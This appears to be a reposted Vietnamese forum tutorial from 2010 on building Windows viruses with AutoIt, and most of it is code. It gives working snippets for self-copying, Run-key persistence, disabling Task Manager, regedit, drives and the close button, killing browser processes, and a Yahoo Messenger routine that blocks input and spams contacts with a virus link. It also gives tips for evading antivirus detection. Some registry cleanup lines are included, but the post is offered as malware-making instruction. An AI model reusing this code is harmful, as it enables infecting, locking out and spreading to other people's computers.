AutoIt và 1 số lệnh hay
(28/12/2010)

Đầu tiên các bạn phải down chương trình về tại đây
AutoIt Script Home Page
Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
*Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
+Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
+Nếu có coppy bài này thì nhớ ghi bài viết này của marryme ở babu.vn =="
+Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
+Các lệnh mình sẽ làm nổi lên


Ai cần source code của 1 con virus thì pm trong babu ^^

Bắt đầu:
Chiều mọi người nên mình post hình lun ><"
Bước 1: Coppy các code từ babu

Bước 2: Tạo 1 file au3

Bước 3:Edit scirpt

Bước 4aste code vào

Bước 5:Convert file au3 --> exe (cái này quan trọng)

Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^


Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở khay icon

FileCopy(@ScriptDir & "\******.exe","C:\WINDOWS",1)
---> "*****" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run","explorer")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableTaskM gr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableTas kMgr")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableRegis tryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableReg istryTools")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoRun","R EG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoRun")

RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","kick_bay_gio@yahoo. com.vn")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","1")

----> lệnh này sẽ giúp bạn thay đổi homepage của IE, ở đây mình change homepage lại là kick_bay_gio@yahoo.com.vn ^^"

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoViewOnDr ive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoDrives", "REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoViewOn Drive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" )
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoDrives ")


RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")
---> lệnh này làm mất nút close ở mỗi chương trinh (bật lên là kô thể tắt được (O_o)
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoClose")

Lệnh reset máy:
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy

Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây

Cách phát tán trên yahoo (hót nhất ^^)
Dim $tin[10] -----> $tin[so] So: số ở đây là số tin nhắn mà bạn muống gửi trong yahoo
$tin[0] ="marryme " ------> bạn đặt lời nhắn vào trong dấu ngoặc kép + link down virus ^^"
$tin[1] ="vip"
$tin[2] =" nhut"
$tin[3] =" babu"
$tin[4] =" ...."
$tin[5] =" ...."
$tin[6] ="...... "
$tin[7] ="..... "
$tin[8] ="..... "
$tin[9] ="...... "
$tieude = WinGetTitle("Yahoo! Messenger","")
$kiemtra = WinExists ($tieude)
While 1
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
Sleep(2500)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf

Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)

While 1
If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd
----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf

Bài viết sưu tầm

HỖ TRỢ TRỰC TUYẾN
Tư Vấn
Kinh Doanh
Kỹ Thuật
Báo Sự Cố
Liên Hệ
Phone 1: 08 4456 9999
Phone 2: 04 4456 9999
Phone 3: 08 35262570